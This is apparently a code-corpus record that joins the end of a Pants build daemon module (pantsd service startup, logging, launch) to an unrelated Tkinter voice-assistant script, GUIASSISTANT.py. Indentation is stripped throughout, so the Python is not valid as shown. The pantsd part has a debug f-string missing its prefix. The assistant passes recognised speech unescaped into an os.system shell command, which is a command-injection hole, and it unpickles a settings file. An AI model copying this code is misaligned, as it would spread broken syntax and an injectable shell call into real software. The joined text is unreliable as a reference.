store_gc_service = StoreGCService(legacy_graph_scheduler.scheduler)
return PantsServices(
services=(fs_event_service, scheduler_service, pailgun_service, store_gc_service),
port_map=dict(pailgun=pailgun_service.pailgun_port),
)
def __init__(self, native, build_root, work_dir, log_level, services,
metadata_base_dir, bootstrap_options=None):
"""
:param Native native: A `Native` instance.
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param PantsServices services: A registry of services to use in this run.
:param string metadata_base_dir: The ProcessManager metadata base dir.
:param Options bootstrap_options: The bootstrap options, if available.
"""
super().__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._native = native
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._services = services
self._bootstrap_options = bootstrap_options
self._log_show_rust_3rdparty = bootstrap_options.for_global_scope().log_show_rust_3rdparty if bootstrap_options else True
self._log_dir = os.path.join(work_dir, self.name)
self._logger = logging.getLogger(__name__)
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
@memoized_property
def watchman_launcher(self):
return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
@property
def is_killed(self):
return self._kill_switch.is_set()
@property
def options_fingerprint(self):
return OptionsFingerprinter.combined_options_fingerprint_for_scope(
GLOBAL_SCOPE,
self._bootstrap_options,
fingerprint_key='daemon',
invert=True
)
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
with self._services.lifecycle_lock:
for service, service_thread in service_thread_map.items():
self._logger.info(f'terminating pantsd service: {service}')
service.terminate()
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_stdio():
"""Close stdio streams to avoid output in the tty that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
@contextmanager
def _pantsd_logging(self):
"""A context manager that runs with pantsd logging.
Asserts that stdio (represented by file handles 0, 1, 2) is closed to ensure that
we can safely reuse those fd numbers.
"""
# Ensure that stdio is closed so that we can safely reuse those file descriptors.
for fd in (0, 1, 2):
try:
os.fdopen(fd)
raise AssertionError(
f'pantsd logging cannot initialize while stdio is open: {fd}')
except OSError:
pass
# Redirect stdio to /dev/null for the rest of the run, to reserve those file descriptors
# for further forks.
with stdio_as(stdin_fd=-1, stdout_fd=-1, stderr_fd=-1):
# Reinitialize logging for the daemon context.
init_rust_logger(self._log_level, self._log_show_rust_3rdparty)
result = setup_logging(self._log_level, log_dir=self._log_dir, log_name=self.LOG_NAME, native=self._native)
self._native.override_thread_logging_destination_to_just_pantsd()
# Do a python-level redirect of stdout/stderr, which will not disturb `0,1,2`.
# TODO: Consider giving these pipes/actual fds, in order to make them "deep" replacements
# for `1,2`, and allow them to be used via `stdio_as`.
sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_handler)
sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_handler)
self._logger.debug('logging initialized')
yield (result.log_handler.stream, result.log_handler.native_filename)
def _setup_services(self, pants_services):
for service in pants_services.services:
self._logger.info(f'setting up service {service}')
service.setup(self._services)
@staticmethod
def _make_thread(service):
name = f"{service.__class__.__name__}Thread"
def target():
Native().override_thread_logging_destination_to_just_pantsd()
service.run()
t = threading.Thread(target=target, name=name)
t.daemon = True
return t
def _run_services(self, pants_services):
"""Service runner main loop."""
if not pants_services.services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: self._make_thread(service)
for service in pants_services.services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info(f'starting service {service}')
try:
service_thread.start()
except (RuntimeError, FSEventService.ServiceError):
self.shutdown(service_thread_map)
raise PantsDaemon.StartupFailure(f'service {service} failed to start, shutting down!')
# Once all services are started, write our pid.
self.write_pid()
self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, ensure_text(self.options_fingerprint))
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise PantsDaemon.RuntimeFailure(f'service failure for {service}, shutting down!')
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
"""Synchronously run pantsd."""
os.environ.pop('PYTHONPATH')
# Switch log output to the daemon's log stream from here forward.
# Also, register an exiter using os._exit to ensure we only close stdio streams once.
self._close_stdio()
with self._pantsd_logging() as (log_stream, log_filename), \
ExceptionSink.exiter_as(lambda _: Exiter(exiter=os._exit)):
# We don't have any stdio streams to log to anymore, so we log to a file.
# We don't override the faulthandler destination because the stream we get will proxy things
# via the rust logging code, and faulthandler needs to be writing directly to a real file
# descriptor. When pantsd logging was originally initialised, we already set up faulthandler
# to log to the correct file descriptor, so don't override it.
#
# We can get tracebacks of the pantsd process by tailing the pantsd log and sending it
# SIGUSR2.
ExceptionSink.reset_interactive_output_stream(
log_stream,
override_faulthandler_destination=False,
)
# Reset the log location and the backtrace preference from the global bootstrap options.
global_bootstrap_options = self._bootstrap_options.for_global_scope()
ExceptionSink.reset_should_print_backtrace_to_terminal(
global_bootstrap_options.print_exception_stacktrace)
ExceptionSink.reset_log_location(global_bootstrap_options.pants_workdir)
self._native.set_panic_handler()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title(f'pantsd [{self._build_root}]')
# Write service socket information to .pids.
self._write_named_sockets(self._services.port_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemon_spawn()."""
spawn_control_env = dict(PANTS_ENTRYPOINT=f'{__name__}:launch',
# The daemon should run under the same sys.path as us; so we ensure
# this. NB: It will scrub PYTHONPATH once started to avoid infecting
# its own unrelated subprocesses.
PYTHONPATH=os.pathsep.join(sys.path))
exec_env = {**os.environ, **spawn_control_env}
# Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
cmd = [sys.executable] + sys.argv
spawn_control_env_vars = ' '.join(f'{k}={v}' for k, v in spawn_control_env.items())
cmd_line = ' '.join(cmd)
self._logger.debug(f'cmd is: {spawn_control_env_vars} {cmd_line}')
# TODO: Improve error handling on launch failures.
os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def needs_launch(self):
"""Determines if pantsd needs to be launched.
N.B. This should always be called under care of the `lifecycle_lock`.
:returns: True if the daemon needs launching, False otherwise.
:rtype: bool
"""
new_fingerprint = self.options_fingerprint
self._logger.debug('pantsd: is_alive={self.is_alive()} new_fingerprint={new_fingerprint} current_fingerprint={self.fingerprint}')
return self.needs_restart(new_fingerprint)
def launch(self):
"""Launches pantsd in a subprocess.
N.B. This should always be called under care of the `lifecycle_lock`.
:returns: A Handle for the pantsd instance.
:rtype: PantsDaemon.Handle
"""
self.terminate(include_watchman=False)
self.watchman_launcher.maybe_launch()
self._logger.debug('launching pantsd')
self.daemon_spawn()
# Wait up to 60 seconds for pantsd to write its pidfile.
pantsd_pid = self.await_pid(60)
listening_port = self.read_named_socket('pailgun', int)
self._logger.debug(f'pantsd is running at pid {self.pid}, pailgun port is {listening_port}')
return self.Handle(pantsd_pid, listening_port, self._metadata_base_dir)
def terminate(self, include_watchman=True):
"""Terminates pantsd and watchman.
N.B. This should always be called under care of the `lifecycle_lock`.
"""
super().terminate()
if include_watchman:
self.watchman_launcher.terminate()
def needs_restart(self, option_fingerprint):
"""
Overrides ProcessManager.needs_restart, to account for the case where pantsd is running
but we want to shutdown after this run.
:param option_fingerprint: A fingeprint of the global bootstrap options.
:return: True if the daemon needs to restart.
"""
should_shutdown_after_run = self._bootstrap_options.for_global_scope().shutdown_pantsd_after_run
return super().needs_restart(option_fingerprint) or \
(self.is_alive() and should_shutdown_after_run)
def launch():
"""An external entrypoint that spawns a new pantsd instance."""
PantsDaemon.Factory.create(OptionsBootstrapper.create()).run_sync()
|
GUIASSISTANT.py | #########################
# GLOBAL VARIABLES USED #
#########################
ai_name = 'F.R.I.D.Y.'.lower()
EXIT_COMMANDS = ['bye','exit','quit','shut down', 'shutdown']
rec_email, rec_phoneno = "", ""
WAEMEntry = None
avatarChoosen = 0
choosedAvtrImage = None
botChatTextBg = "#007cc7"
botChatText = "white"
userChatTextBg = "#4da8da"
chatBgColor = '#12232e'
background = '#203647'
textColor = 'white'
AITaskStatusLblBG = '#203647'
KCS_IMG = 1 #0 for light, 1 for dark
voice_id = 0 #0 for female, 1 for male
ass_volume = 1 #max volume
ass_voiceRate = 200 #normal voice rate
""" User Created Modules """
try:
import normalChat
import math_function
import appControl
import webScrapping
import game
from userHandler import UserData
import timer
from FACE_UNLOCKER import clickPhoto, viewPhoto
import dictionary
import ToDo
import fileHandler
except Exception as e:
raise e
""" System Modules """
try:
import os
import speech_recognition as sr
import pyttsx3
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from tkinter import colorchooser
from PIL import Image, ImageTk
from time import sleep
from threading import Thread
except Exception as e:
print(e)
########################################## LOGIN CHECK ##############################################
try:
user = UserData()
user.extractData()
ownerName = user.getName().split()[0]
ownerDesignation = "Sir"
if user.getGender()=="Female": ownerDesignation = "Ma'am"
ownerPhoto = user.getUserPhoto()
except Exception as e:
print("You're not Registered Yet !\nRun SECURITY.py file to register your face.")
raise SystemExit
########################################## BOOT UP WINDOW ###########################################
def ChangeSettings(write=False):
import pickle
global background, textColor, chatBgColor, voice_id, ass_volume, ass_voiceRate, AITaskStatusLblBG, KCS_IMG, botChatTextBg, botChatText, userChatTextBg
setting = {'background': background,
'textColor': textColor,
'chatBgColor': chatBgColor,
'AITaskStatusLblBG': AITaskStatusLblBG,
'KCS_IMG': KCS_IMG,
'botChatText': botChatText,
'botChatTextBg': botChatTextBg,
'userChatTextBg': userChatTextBg,
'voice_id': voice_id,
'ass_volume': ass_volume,
'ass_voiceRate': ass_voiceRate
}
if write:
with open('userData/settings.pck', 'wb') as file:
pickle.dump(setting, file)
return
try:
with open('userData/settings.pck', 'rb') as file:
loadSettings = pickle.load(file)
background = loadSettings['background']
textColor = loadSettings['textColor']
chatBgColor = loadSettings['chatBgColor']
AITaskStatusLblBG = loadSettings['AITaskStatusLblBG']
KCS_IMG = loadSettings['KCS_IMG']
botChatText = loadSettings['botChatText']
botChatTextBg = loadSettings['botChatTextBg']
userChatTextBg = loadSettings['userChatTextBg']
voice_id = loadSettings['voice_id']
ass_volume = loadSettings['ass_volume']
ass_voiceRate = loadSettings['ass_voiceRate']
except Exception as e:
pass
if os.path.exists('userData/settings.pck')==False:
ChangeSettings(True)
def getChatColor():
global chatBgColor
chatBgColor = myColor[1]
colorbar['bg'] = chatBgColor
chat_frame['bg'] = chatBgColor
root1['bg'] = chatBgColor
def changeTheme():
global background, textColor, AITaskStatusLblBG, KCS_IMG, botChatText, botChatTextBg, userChatTextBg, chatBgColor
if themeValue.get()==1:
background, textColor, AITaskStatusLblBG, KCS_IMG = "#203647", "white", "#203647",1
cbl['image'] = cblDarkImg
kbBtn['image'] = kbphDark
settingBtn['image'] = sphDark
AITaskStatusLbl['bg'] = AITaskStatusLblBG
botChatText, botChatTextBg, userChatTextBg = "white", "#007cc7", "#4da8da"
chatBgColor = "#12232e"
colorbar['bg'] = chatBgColor
else:
background, textColor, AITaskStatusLblBG, KCS_IMG = "#F6FAFB", "#303E54", "#14A769", 0
cbl['image'] = cblLightImg
kbBtn['image'] = kbphLight
settingBtn['image'] = sphLight
AITaskStatusLbl['bg'] = AITaskStatusLblBG
botChatText, botChatTextBg, userChatTextBg = "#494949", "#EAEAEA", "#23AE79"
chatBgColor = "#F6FAFB"
colorbar['bg'] = '#E8EBEF'
root['bg'], root2['bg'] = background, background
settingsFrame['bg'] = background
settingsLbl['fg'], userPhoto['fg'], userName['fg'], assLbl['fg'], voiceRateLbl['fg'], volumeLbl['fg'], themeLbl['fg'], chooseChatLbl['fg'] = textColor, textColor, textColor, textColor, textColor, textColor, textColor, textColor
settingsLbl['bg'], userPhoto['bg'], userName['bg'], assLbl['bg'], voiceRateLbl['bg'], volumeLbl['bg'], themeLbl['bg'], chooseChatLbl['bg'] = background, background, background, background, background, background, background, background
s.configure('Wild.TRadiobutton', background=background, foreground=textColor)
volumeBar['bg'], volumeBar['fg'], volumeBar['highlightbackground'] = background, textColor, background
chat_frame['bg'], root1['bg'] = chatBgColor, chatBgColor
userPhoto['activebackground'] = background
ChangeSettings(True)
def changeVoice(e):
global voice_id
voice_id=0
if assVoiceOption.get()=='Male': voice_id=1
engine.setProperty('voice', voices[voice_id].id)
ChangeSettings(True)
def changeVolume(e):
global ass_volume
ass_volume = volumeBar.get() / 100
engine.setProperty('volume', ass_volume)
ChangeSettings(True)
def changeVoiceRate(e):
global ass_voiceRate
temp = voiceOption.get()
if temp=='Very Low': ass_voiceRate = 100
elif temp=='Low': ass_voiceRate = 150
elif temp=='Fast': ass_voiceRate = 250
elif temp=='Very Fast': ass_voiceRate = 300
else: ass_voiceRate = 200
print(ass_voiceRate)
engine.setProperty('rate', ass_voiceRate)
ChangeSettings(True)
ChangeSettings()
############################################ SET UP VOICE ###########################################
try:
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[voice_id].id) #male
engine.setProperty('volume', ass_volume)
except Exception as e:
print(e)
####################################### SET UP TEXT TO SPEECH #######################################
def speak(text, display=False, icon=False):
AITaskStatusLbl['text'] = 'Speaking...'
if icon: Label(chat_frame, image=botIcon, bg=chatBgColor).pack(anchor='w',pady=0)
if display: attachTOframe(text, True)
print('\n'+ai_name.upper()+': '+text)
try:
engine.say(text)
engine.runAndWait()
except:
print("Try not to type more...")
####################################### SET UP SPEECH TO TEXT #######################################
def record(clearChat=True, iconDisplay=True):
print('\nListening...')
AITaskStatusLbl['text'] = 'Listening...'
r = sr.Recognizer()
r.dynamic_energy_threshold = False
r.energy_threshold = 4000
with sr.Microphone() as source:
r.adjust_for_ambient_noise(source)
audio = r.listen(source)
said = ""
try:
AITaskStatusLbl['text'] = 'Processing...'
said = r.recognize_google(audio)
print(f"\nUser said: {said}")
if clearChat:
clearChatScreen()
if iconDisplay: Label(chat_frame, image=userIcon, bg=chatBgColor).pack(anchor='e',pady=0)
attachTOframe(said)
except Exception as e:
print(e)
# speak("I didn't get it, Say that again please...")
if "connection failed" in str(e):
speak("Your System is Offline...", True, True)
return 'None'
return said.lower()
def voiceMedium():
while True:
query = record()
if query == 'None': continue
if isContain(query, EXIT_COMMANDS):
speak("Shutting down the System. Good Bye "+ownerDesignation+"!", True, True)
break
else: main(query.lower())
appControl.Win_Opt('close')
def keyboardInput(e):
user_input = UserField.get().lower()
if user_input!="":
clearChatScreen()
if isContain(user_input, EXIT_COMMANDS):
speak("Shutting down the System. Good Bye "+ownerDesignation+"!", True, True)
else:
Label(chat_frame, image=userIcon, bg=chatBgColor).pack(anchor='e',pady=0)
attachTOframe(user_input.capitalize())
Thread(target=main, args=(user_input,)).start()
UserField.delete(0, END)
###################################### TASK/COMMAND HANDLER #########################################
def isContain(txt, lst):
for word in lst:
if word in txt:
return True
return False
def main(text):
if "project" in text:
if isContain(text, ['make', 'create']):
speak("What do you want to give the project name ?", True, True)
projectName = record(False, False)
speak(fileHandler.CreateHTMLProject(projectName.capitalize()), True)
return
if "create" in text and "file" in text:
speak(fileHandler.createFile(text), True, True)
return
if "translate" in text:
speak("What do you want to translate?", True, True)
sentence = record(False, False)
speak("Which langauage to translate ?", True)
langauage = record(False, False)
result = normalChat.lang_translate(sentence, langauage)
if result=="None": speak("This langauage doesn't exists")
else:
speak(f"In {langauage.capitalize()} you would say:", True)
if langauage=="hindi":
attachTOframe(result.text, True)
speak(result.pronunciation)
else: speak(result.text, True)
return
if 'list' in text:
if isContain(text, ['add', 'create', 'make']):
speak("What do you want to add?", True, True)
item = record(False, False)
ToDo.toDoList(item)
speak("Alright, I added to your list", True)
return
if isContain(text, ['show', 'my list']):
items = ToDo.showtoDoList()
if len(items)==1:
speak(items[0], True, True)
return
attachTOframe('\n'.join(items), True)
speak(items[0])
return
if isContain(text, ['battery', 'system info']):
result = appControl.OSHandler(text)
if len(result)==2:
speak(result[0], True, True)
attachTOframe(result[1], True)
else:
speak(result, True, True)
return
if isContain(text, ['meaning', 'dictionary', 'definition', 'define']):
result = dictionary.translate(text)
speak(result[0], True, True)
if result[1]=='': return
speak(result[1], True)
return
if 'selfie' in text or ('click' in text and 'photo' in text):
speak("Sure "+ownerDesignation+"...", True, True)
clickPhoto()
speak('Do you want to view your clicked photo?', True)
query = record(False)
if isContain(query, ['yes', 'sure', 'yeah', 'show me']):
Thread(target=viewPhoto).start()
speak("Ok, here you go...", True, True)
else:
speak("No Problem "+ownerDesignation, True, True)
return
if 'volume' in text:
appControl.volumeControl(text)
Label(chat_frame, image=botIcon, bg=chatBgColor).pack(anchor='w',pady=0)
attachTOframe('Volume Settings Changed', True)
return
if isContain(text, ['timer', 'countdown']):
Thread(target=timer.startTimer, args=(text,)).start()
speak('Ok, Timer Started!', True, True)
return
if 'whatsapp' in text:
speak("Sure "+ownerDesignation+"...", True, True)
speak('Whom do you want to send the message?', True)
WAEMPOPUP("WhatsApp", "Phone Number")
attachTOframe(rec_phoneno)
speak('What is the message?', True)
message = record(False, False)
Thread(target=webScrapping.sendWhatsapp, args=(rec_phoneno, message,)).start()
speak("Message is on the way. Do not move away from the screen.")
attachTOframe("Message Sent", True)
return
if 'email' in text:
speak('Whom do you want to send the email?', True, True)
WAEMPOPUP("Email", "E-mail Address")
attachTOframe(rec_email)
speak('What is the Subject?', True)
subject = record(False, False)
speak('What message you want to send ?', True)
message = record(False, False)
Thread(target=webScrapping.email, args=(rec_email,message,subject,) ).start()
speak('Email has been Sent', True)
return
if isContain(text, ['covid','virus']):
result = webScrapping.covid(text)
if 'str' in str(type(result)):
speak(result, True, True)
return
speak(result[0], True, True)
result = '\n'.join(result[1])
attachTOframe(result, True)
return
if isContain(text, ['youtube','video']):
speak("Ok "+ownerDesignation+", here a video for you...", True, True)
try:
speak(webScrapping.youtube(text), True)
except Exception as e:
speak("Desired Result Not Found", True)
return
if isContain(text, ['search', 'image']):
if 'image' in text and 'show' in text:
Thread(target=showImages, args=(text,)).start()
speak('Here are the images...', True, True)
return
speak(webScrapping.googleSearch(text), True, True)
return
if isContain(text, ['map', 'direction']):
if "direction" in text:
speak('What is your starting location?', True, True)
startingPoint = record(False, False)
speak("Ok "+ownerDesignation+", Where you want to go?", True)
destinationPoint = record(False, False)
speak("Ok "+ownerDesignation+", Getting Directions...", True)
try:
distance = webScrapping.giveDirections(startingPoint, destinationPoint)
speak('You have to cover a distance of '+ distance, True)
except:
speak("I think location is not proper, Try Again!")
else:
webScrapping.maps(text)
speak('Here you go...', True, True)
return
if isContain(text, ['factorial','log','value of','math',' + ',' - ',' x ','multiply','divided by','binary','hexadecimal','octal','shift','sin ','cos ','tan ']):
try:
speak(('Result is: ' + math_function.perform(text)), True, True)
except Exception as e:
return
return
if "joke" in text:
speak('Here is a joke...', True, True)
speak(webScrapping.jokes(), True)
return
if isContain(text, ['news']):
speak('Getting the latest news...', True, True)
headlines,headlineLinks = webScrapping.latestNews(2)
for head in headlines: speak(head, True)
speak('Do you want to read the full news?', True)
text = record(False, False)
if isContain(text, ["no","don't"]):
speak("No Problem "+ownerDesignation, True)
else:
speak("Ok "+ownerDesignation+", Opening browser...", True)
webScrapping.openWebsite('https://indianexpress.com/latest-news/')
speak("You can now read the full news from this website.")
return
if isContain(text, ['weather']):
data = webScrapping.weather()
speak('', False, True)
showSingleImage("weather", data[:-1])
speak(data[-1])
return
if isContain(text, ['screenshot']):
Thread(target=appControl.Win_Opt, args=('screenshot',)).start()
speak("Screen Shot Taken", True, True)
return
if isContain(text, ['window','close that']):
appControl.Win_Opt(text)
return
if isContain(text, ['tab']):
appControl.Tab_Opt(text)
return
if isContain(text, ['setting']):
raise_frame(root2)
clearChatScreen()
return
if isContain(text, ['open','type','save','delete','select','press enter']):
appControl.System_Opt(text)
return
if isContain(text, ['wiki', 'who is']):
Thread(target=webScrapping.downloadImage, args=(text, 1,)).start()
speak('Searching...', True, True)
result = webScrapping.wikiResult(text)
showSingleImage('wiki')
speak(result, True)
return
if isContain(text, ['game']):
speak("Which game do you want to play?", True, True)
attachTOframe(game.showGames(), True)
text = record(False)
if text=="None":
speak("Didn't understand what you say?", True, True)
return
if 'online' in text:
speak("Ok "+ownerDesignation+", Let's play some online games", True, True)
webScrapping.openWebsite('https://www.agame.com/games/mini-games/')
return
if isContain(text, ["don't", "no", "cancel", "back", "never"]):
speak("No Problem "+ownerDesignation+", We'll play next time.", True, True)
else:
speak("Ok "+ownerDesignation+", Let's Play " + text, True, True)
os.system(f"python -c \"import game; game.play('{text}')\"")
return
if isContain(text, ['coin','dice','die']):
if "toss" in text or "roll" in text or "flip" in text:
speak("Ok "+ownerDesignation, True, True)
result = game.play(text)
if "Head" in result: showSingleImage('head')
elif "Tail" in result: showSingleImage('tail')
else: showSingleImage(result[-1])
speak(result)
return
if isContain(text, ['time','date']):
speak(normalChat.chat(text), True, True)
return
if 'my name' in text:
speak('Your name is, ' + ownerName, True, True)
return
if isContain(text, ['voice']):
global voice_id
try:
if 'female' in text: voice_id = 0
elif 'male' in text: voice_id = 1
else:
if voice_id==0: voice_id=1
else: voice_id=0
engine.setProperty('voice', voices[voice_id].id)
ChangeSettings(True)
speak("Hello "+ownerDesignation+", I have changed my voice. How may I help you?", True, True)
assVoiceOption.current(voice_id)
except Exception as e:
print(e)
return
if isContain(text, ['morning','evening','noon']) and 'good' in text:
speak(normalChat.chat("good"), True, True)
return
result = normalChat.reply(text)
if result != "None": speak(result, True, True)
else:
speak("Here's what I found on the web... ", True, True)
webScrapping.googleSearch(text)
##################################### DELETE USER ACCOUNT #########################################
def deleteUserData():
result = messagebox.askquestion('Alert', 'Are you sure you want to delete your Face Data ?')
if result=='no': return
messagebox.showinfo('Clear Face Data', 'Your face has been cleared\nRegister your face again to use.')
import shutil
shutil.rmtree('userData')
root.destroy()
#####################
####### GUI #########
#####################
############ ATTACHING BOT/USER CHAT ON CHAT SCREEN ###########
def attachTOframe(text,bot=False):
if bot:
botchat = Label(chat_frame,text=text, bg=botChatTextBg, fg=botChatText, justify=LEFT, wraplength=250, font=('Montserrat',12, 'bold'))
botchat.pack(anchor='w',ipadx=5,ipady=5,pady=5)
else:
userchat = Label(chat_frame, text=text, bg=userChatTextBg, fg='white', justify=RIGHT, wraplength=250, font=('Montserrat',12, 'bold'))
userchat.pack(anchor='e',ipadx=2,ipady=2,pady=5)
def clearChatScreen():
for wid in chat_frame.winfo_children():
wid.destroy()
### SWITCHING BETWEEN FRAMES ###
def raise_frame(frame):
frame.tkraise()
clearChatScreen()
################# SHOWING DOWNLOADED IMAGES ###############
img0, img1, img2, img3, img4 = None, None, None, None, None
def showSingleImage(type, data=None):
global img0, img1, img2, img3, img4
try:
img0 = ImageTk.PhotoImage(Image.open('Downloads/0.jpg').resize((90,110), Image.ANTIALIAS))
except:
pass
img1 = ImageTk.PhotoImage(Image.open('extrafiles/images/heads.jpg').resize((220,200), Image.ANTIALIAS))
img2 = ImageTk.PhotoImage(Image.open('extrafiles/images/tails.jpg').resize((220,200), Image.ANTIALIAS))
img4 = ImageTk.PhotoImage(Image.open('extrafiles/images/WeatherImage.png'))
if type=="weather":
weather = Frame(chat_frame)
weather.pack(anchor='w')
Label(weather, image=img4, bg=chatBgColor).pack()
Label(weather, text=data[0], font=('Arial Bold', 45), fg='white', bg='#3F48CC').place(x=65,y=45)
Label(weather, text=data[1], font=('Montserrat', 15), fg='white', bg='#3F48CC').place(x=78,y=110)
Label(weather, text=data[2], font=('Montserrat', 10), fg='white', bg='#3F48CC').place(x=78,y=140)
Label(weather, text=data[3], font=('Arial Bold', 12), fg='white', bg='#3F48CC').place(x=60,y=160)
elif type=="wiki":
Label(chat_frame, image=img0, bg='#EAEAEA').pack(anchor='w')
elif type=="head":
Label(chat_frame, image=img1, bg='#EAEAEA').pack(anchor='w')
elif type=="tail":
Label(chat_frame, image=img2, bg='#EAEAEA').pack(anchor='w')
else:
img3 = ImageTk.PhotoImage(Image.open('extrafiles/images/dice/'+type+'.jpg').resize((200,200), Image.ANTIALIAS))
Label(chat_frame, image=img3, bg='#EAEAEA').pack(anchor='w')
def showImages(query):
global img0, img1, img2, img3
webScrapping.downloadImage(query)
w, h = 150, 110
#Showing Images
imageContainer = Frame(chat_frame, bg='#EAEAEA')
imageContainer.pack(anchor='w')
#loading images
img0 = ImageTk.PhotoImage(Image.open('Downloads/0.jpg').resize((w,h), Image.ANTIALIAS))
img1 = ImageTk.PhotoImage(Image.open('Downloads/1.jpg').resize((w,h), Image.ANTIALIAS))
img2 = ImageTk.PhotoImage(Image.open('Downloads/2.jpg').resize((w,h), Image.ANTIALIAS))
img3 = ImageTk.PhotoImage(Image.open('Downloads/3.jpg').resize((w,h), Image.ANTIALIAS))
#Displaying
Label(imageContainer, image=img0, bg='#EAEAEA').grid(row=0, column=0)
Label(imageContainer, image=img1, bg='#EAEAEA').grid(row=0, column=1)
Label(imageContainer, image=img2, bg='#EAEAEA').grid(row=1, column=0)
Label(imageContainer, image=img3, bg='#EAEAEA').grid(row=1, column=1)
############################# WAEM - WhatsApp Email ##################################
def sendWAEM():
global rec_phoneno, rec_email
data = WAEMEntry.get()
rec_email, rec_phoneno = data, data
WAEMEntry.delete(0, END)
appControl.Win_Opt('close')
def send(e):
sendWAEM()
def WAEMPOPUP(Service='None', rec='Reciever'):
global WAEMEntry
PopUProot = Tk()
PopUProot.title(f'{Service} Service')
PopUProot.configure(bg='white')
if Service=="WhatsApp": PopUProot.iconbitmap("extrafiles/images/whatsapp.ico")
else: PopUProot.iconbitmap("extrafiles/images/email.ico")
w_width, w_height = 410, 200
s_width, s_height = PopUProot.winfo_screenwidth(), PopUProot.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
PopUProot.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
Label(PopUProot, text=f'Reciever {rec}', font=('Arial', 16), bg='white').pack(pady=(20, 10))
WAEMEntry = Entry(PopUProot, bd=10, relief=FLAT, font=('Arial', 12), justify='center', bg='#DCDCDC', width=30)
WAEMEntry.pack()
WAEMEntry.focus()
SendBtn = Button(PopUProot, text='Send', font=('Arial', 12), relief=FLAT, bg='#14A769', fg='white', command=sendWAEM)
SendBtn.pack(pady=20, ipadx=10)
PopUProot.bind('<Return>', send)
PopUProot.mainloop()
######################## CHANGING CHAT BACKGROUND COLOR #########################
def getChatColor():
global chatBgColor
myColor = colorchooser.askcolor()
if myColor[1] is None: return
chatBgColor = myColor[1]
colorbar['bg'] = chatBgColor
chat_frame['bg'] = chatBgColor
root1['bg'] = chatBgColor
ChangeSettings(True)
chatMode = 1
def changeChatMode():
global chatMode
if chatMode==1:
# appControl.volumeControl('mute')
VoiceModeFrame.pack_forget()
TextModeFrame.pack(fill=BOTH)
UserField.focus()
chatMode=0
else:
# appControl.volumeControl('full')
TextModeFrame.pack_forget()
VoiceModeFrame.pack(fill=BOTH)
root.focus()
chatMode=1
############################################## GUI #############################################
def onhover(e):
userPhoto['image'] = chngPh
def onleave(e):
userPhoto['image'] = userProfileImg
def UpdateIMAGE():
global ownerPhoto, userProfileImg, userIcon
os.system('python ChooseAvatarPIC.py')
u = UserData()
u.extractData()
ownerPhoto = u.getUserPhoto()
userProfileImg = ImageTk.PhotoImage(Image.open("extrafiles/images/avatars/a"+str(ownerPhoto)+".png").resize((120, 120)))
userPhoto['image'] = userProfileImg
userIcon = PhotoImage(file="extrafiles/images/avatars/ChatIcons/a"+str(ownerPhoto)+".png")
def SelectAvatar():
Thread(target=UpdateIMAGE).start()
##################################### MAIN GUI ####################################################
#### SPLASH/LOADING SCREEN ####
def progressbar():
s = ttk.Style()
s.theme_use('clam')
s.configure("white.Horizontal.TProgressbar", foreground='white', background='white')
progress_bar = ttk.Progressbar(splash_root,style="white.Horizontal.TProgressbar", orient="horizontal",mode="determinate", length=303)
progress_bar.pack()
splash_root.update()
progress_bar['value'] = 0
splash_root.update()
while progress_bar['value'] < 100:
progress_bar['value'] += 5
# splash_percentage_label['text'] = str(progress_bar['value']) + ' %'
splash_root.update()
sleep(0.1)
def destroySplash():
splash_root.destroy()
if __name__ == '__main__':
splash_root = Tk()
splash_root.configure(bg='#3895d3')
splash_root.overrideredirect(True)
splash_label = Label(splash_root, text="Processing...", font=('montserrat',15),bg='#3895d3',fg='white')
splash_label.pack(pady=40)
# splash_percentage_label = Label(splash_root, text="0 %", font=('montserrat',15),bg='#3895d3',fg='white')
# splash_percentage_label.pack(pady=(0,10))
w_width, w_height = 400, 200
s_width, s_height = splash_root.winfo_screenwidth(), splash_root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
splash_root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30))
progressbar()
splash_root.after(10, destroySplash)
splash_root.mainloop()
root = Tk()
root.title('F.R.I.D.A.Y')
w_width, w_height = 400, 650
s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
root.configure(bg=background)
# root.resizable(width=False, height=False)
root.pack_propagate(0)
root1 = Frame(root, bg=chatBgColor)
root2 = Frame(root, bg=background)
root3 = Frame(root, bg=background)
for f in (root1, root2, root3):
f.grid(row=0, column=0, sticky='news')
